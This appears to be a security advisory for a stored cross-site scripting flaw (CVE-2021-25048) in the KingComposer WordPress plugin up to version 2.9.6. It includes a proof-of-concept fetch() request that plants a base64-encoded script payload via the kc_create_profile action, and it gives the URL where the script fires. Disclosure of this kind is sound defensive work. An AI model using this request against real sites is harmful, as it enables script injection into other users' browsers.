Lucene search
Krzysztof ZającWPEX-ID:5687E5DB-D987-416D-A7F4-036CCE4D56CBHistoryMar 14, 2022 - 12:00 a.m.
KingComposer <= 2.9.6 - Subscriber+ Stored Cross-Site Scripting
2022-03-1400:00:00
Krzysztof Zając
127
kingcomposer
stored cross-site scripting
subscriber+
profile creation
EPSS
0.001
Percentile
24.8%
The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them
Create profile:
fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"name":"y", "slug": "y", "data": btoa("<script>alert(1);</script>")}),
"method": "POST",
"credentials": "include"
});
The XSS will be trigged at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y
Related
wpvulndb
wpvulndb
KingComposer <= 2.9.6 - Subscriber+ Stored Cross-Site Scripting
2022-03-14 00:00:00
nvd
nvd
CVE-2021-25048
2022-04-04 16:15:08
cve
cve
CVE-2021-25048
2022-04-04 16:15:08
prion
prion
Cross site scripting
2022-04-04 16:15:00
cvelist
cvelist
patchstack
patchstack